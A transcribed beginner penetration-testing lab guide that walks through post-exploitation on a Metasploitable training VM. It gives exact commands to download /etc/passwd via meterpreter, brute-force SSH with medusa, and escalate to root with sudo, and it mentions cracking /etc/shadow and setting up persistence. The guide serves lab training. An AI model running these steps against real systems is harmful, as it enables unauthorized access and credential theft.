Post Exploitation. n00bpentesting.com

Transcription

1 Post Exploitation n00bpentesting.com

2 Prerequisites Hardware Software Topics Covered A Note Before You Begin Lab 0ne Post Exploitation What s Next?

3 Prerequisites Thank you for downloading the n00bpentesting.com. This guide is designed to help the n00b penetration tester get their feet wet with some of the tools covered on n00bpentesting.com while honing their skills following the Penetration Testing Execution Standard. Hardware Computer with Linux, Windows, or Mac OSX 4GB RAM Hard- drive with at least 50GB Software VirtualBox Virtualization Software BackTrack 5 R1 Virtual Machine linux.org/downloads Windows XP SP2 Virtual Machine Supply your own copy or use a NIST Image NIST - Metasploitable Virtual Machine 3

4 Topics Covered Post Exploitation A Note All n00bpentesting.com guides will follow applicable sections of the Penetration Testing Execution Standard (PTES). It is highly recommended that any penetration tester or one who wants to move into this field should read and regularly reference the standard. It can be found here: standard.org/ Before You Begin It is important to update BackTrack, SET, and Metasploit before you begin each lesson. Updating these packages will ensure the latest tool updates and fixes are applied for better stability and exploit success. To Update BackTrack At the command prompt type: apt- get update && apt- get upgrade && apt- get dist- upgrade, press ENTER To Update Set At the command prompt type: cd /pentest/exploits/set && svn update, press ENTER To Update Metasploit At the command prompt type: cd /pentest/exploits/framework && svn update, press ENTER 4

5 Lab 0ne Post Exploitation In this lab you will learn how to escalate privileges by using information gained from the initial exploitation of the target. Once the privileges have been escalated to root, then game over, the target system is completely under the control of this user. We were able to show two ways to exploit the target system (hint: there are many), first using metasploit, and second using a specially crafted URI. Once the exploit was successfully launched access to the /etc/passwd file provided insight on the available accounts on the target system that can be used in a brute force password attack. 1. In the running meterpreter session type: download /etc/passwd, press Enter Now that the /etc/passwd file has been downloaded to the BackTrack VM, a password brute force tool can be used to try and obtain a valid set of credentials. We will use a tool called medusa to brute force the password of the msfadmin account. We are telling medusa to try and login to host as user msfadmin using the password file darkc0de.lst, try password same as username, and use SSH for the login attempts. 5

6 2. At the command prompt type: medusa - h u msfadmin - P /pentest/passwords/wordlists/darkc0de.lst - es - M ssh, press ENTER Success! The user msfadmin has a password of msfadmin. Now this account can be used to login to the target via SSH. 3. At the prompt type: ssh msfadmin@metasploitable_ip_address, when prompted for password enter msfadmin 6

7 Though the login was successful, msfadmin is not root and is not currently running as root. This is indicated by the prompt followed by a $, see below. Hopefully, msfadmin is in the sudoers file and we can sudo to root. Let s give it a try. 4. At the command prompt type: sudo i, press ENTER 5. When prompted for the password enter msfadmin The command prompt will change ending in a #, this indicates the user is now running as root. GAME OVER!!! The user privileges were successfully escalated to root and now has access to /etc/shadow, where passwords are hashed for all accounts on the system. This file can be used with John the Ripper to be cracked off- line. Files and services can be uploaded and started for persistence and further exploitation on the network the target resides on. 7

8 What s Next? Continue to explore, and practice, over, and over again. The metasploitable image has several vulnerabilities; in fact, the same vulnerabilities we exploited in a certain manner can be exploited in other methods as well. More guides will become available on n00bpentesting.com. 8